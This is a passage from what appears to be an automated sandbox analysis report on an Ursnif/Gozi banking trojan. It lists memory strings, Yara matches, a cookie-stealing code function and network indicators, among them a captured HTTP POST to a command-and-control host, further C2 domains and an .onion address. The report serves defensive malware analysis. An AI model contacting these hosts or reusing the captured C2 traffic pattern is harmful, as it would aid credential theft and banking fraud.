class=gbmtc><a class=gbmt id=gb_51 href="http://translate.google.de/?hl=de&tab=wT"> equals www.youtube.com (Youtube)
            Source: explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='gLP3r84q5SfHYcfO5+TaTw=='>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.de/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Suche</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="http://www.google.de/imghp?hl=de&tab=wi"><span class=gbtb2></span><span class=gbts>Bilder</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="http://maps.google.de/maps?hl=de&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=de&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="http://www.youtube.com/?gl=DE&tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.de/intl/de/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>Mehr</span><span class=gbma></span></span></a><script nonce='gLP3r84q5SfHYcfO5+TaTw=='>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Kalender</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="http://translate.google.de/?hl=de&tab=wT"> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: resolver1.opendns.com
            Source: unknownHTTP traffic detected: POST /images/LJhn_2FB/_2BnW2YL3WT91OGEGrtontJ/tz26Ur16DO/Vb0fBvZMsYvl_2Ftu/hAIP2LXP9LpY/UxM1U2HyuE6/YjMWiIJ5hAHZr3/VX3S5GavgY0_2BoqFMO3c/kFSjrTDl92m3RG1t/2cQc5CJ1OGgDG5_/2BEmvyPeJqBWghHZ47/QHN7OVQJT/UOEF94X1N7KlQ62WDDer/L0w3gbwf5qg9Ac_2FDW/sra5_2BS3fbC4O/7.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=151135526142640864142783612034User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Content-Length: 387Host: shoshanna.at
            Source: RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmpString found in binary or memory: http://buismashallah.at
            Source: explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501761539.00000209ABB02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmpString found in binary or memory: http://buismashallah.atconstitution.org/usdeclar.txt0x4eb7d2cacom
            Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmp, control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000003.501796313.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmpString found in binary or memory: http://ey7kuuklgieop2pq.onion
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.342491859.00000000089FF000.00000004.00000001.sdmpString found in binary or memory: http://google.com/
            Source: control.exe, 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, control.exe, 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, rundll32.exe, 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://maps.google.de/maps?hl=de&tab=wl
            Source: explorer.exe, 0000000F.00000003.488041253.000000000F9A1000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.348134498.000000000DCAF000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
            Source: RuntimeBroker.exe, 00000016.00000002.527754850.000001F9FFC02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmpString found in binary or memory: http://shoshanna.at
            Source: control.exe, 0000000E.00000003.374902025.000001A4D17FC000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000000.354159270.00000000100DC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000010.00000002.523012050.000002413C913000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000012.00000003.501797062.000001E766A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000013.00000003.501847968.00000209ABB13000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000015.00000003.501797398.000001598A202000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000016.00000003.442079920.000001F9FFA13000.00000004.00000001.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.at
            Source: rundll32.exe, 00000011.00000002.328620335.000001EA0462C000.00000004.00000040.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.at%
            Source: control.exe, 0000000D.00000003.325391949.000002ADA921C000.00000004.00000040.sdmpString found in binary or memory: http://shoshanna.athttp://buismashallah.atQ
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://translate.google.de/?hl=de&tab=wT
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://video.google.de/?hl=de&tab=wv
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.342369174.000000000899B000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/LocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedTue
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/setprefdomain?prefdom=DE&amp;prev=http://www.google.de/&amp;sig=K_D9RthfU2DxpZ
            Source: explorer.exe, 0000000F.00000003.487989608.000000000F971000.00000004.00000040.sdmpString found in binary or memory: http://www.google.com/setprefdomain?prefdom=DE&amp;prev=http://www.google.de/&amp;sig=K_v4zgA6MPUf-M
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/history/optout?hl=de
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/imghp?hl=de&tab=wi
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.google.de/preferences?hl=de
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: http://www.youtube.com/?gl=DE&tab=w1
            Source: explorer.exe, 0000000F.00000000.345907985.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=de&passive=true&continue=http://www.google.com/&ec=GAZAA
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://apis.google.com
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://books.google.de/?hl=de&tab=wp
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://news.google.com/?tab=wn
            Source: explorer.exe, 0000000F.00000000.347957518.000000000DC20000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://play.google.com/?hl=de&tab=w8
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmpString found in binary or memory: https://plusone.google.com/u/0
            Source: explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/intl/de/about/products?tab=wh
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/shopping?hl=de&source=og&tab=wf
            Source: explorer.exe, 0000000F.00000003.488074901.000000000F9A2000.00000004.00000040.sdmp, explorer.exe, 0000000F.00000003.344640628.000000000FE17000.00000004.00000040.sdmpString found in binary or memory: https://www.google.de/webhp?tab=ww

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.368704719.000002EEDF6F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.385751279.000002AFF3B90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.377887013.000002443596E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.515418751.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.525641924.000001F9FF17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.407827264.000000000299D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.406559258.0000000000770000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.487533032.000002413CBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524005324.000002413CB3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.527559598.000001F9FFA2E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.516931304.000001E76679E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.521823311.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.326429634.000001EA03E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.523394119.00000209AC3BE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.527295888.000001F9FF96E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.410971539.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.516710517.000001598A16E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.317519202.000001A4CF920000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.383919098.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524405231.000002413CBFE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.515033269.0000015989FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.338227300.000000000701E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.435140531.00000207B76AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.516037989.000001598A0AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.319348534.000002ADA73F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.376270736.00000244358E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.505329521.000002AFF3C7E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.522755619.00000209AC2FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.517273207.000001E76685E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.322573537.0000000004F20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.502120858.000000000480D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.490824875.000002EEDF87E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 7096, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 7116, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 5848, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4540, type: MEMORY

            E-Banking Fraud:

            barindex
            Detected Gozi e-Banking trojanShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff26_2_0091D75A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie26_2_0091D75A
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000016.00000003.494462793.000001F9FFE00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000003.492845933.000001598A140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.486145705.000000000092D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.489186480.000001E766830000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.523571925.000002413CA3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.368704719.000002EEDF6F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000003.491218857.00000209AC190000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.385751279.000002AFF3B90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.377887013.000002443596E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.515418751.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.525641924.000001F9FF17E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.485504696.0000000004F50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.407827264.000000000299D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.327809364.00000000002AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.406559258.0000000000770000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000003.487533032.000002413CBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524005324.000002413CB3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.527559598.000001F9FFA2E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.516931304.000001E76679E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.521823311.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.328442434.000001EA0414E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.326429634.000001EA03E90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.523394119.00000209AC3BE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.527295888.000001F9FF96E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.410971539.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.377395710.00000000007DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.516710517.000001598A16E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.317519202.000001A4CF920000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.383919098.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.524405231.000002413CBFE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.515033269.0000015989FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000000.338227300.000000000701E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.435140531.00000207B76AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.516037989.000001598A0AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000003.319348534.000002ADA73F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.376270736.00000244358E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.505329521.000002AFF3C7E000.00000004.00000001.sdmp, type: MEMORY
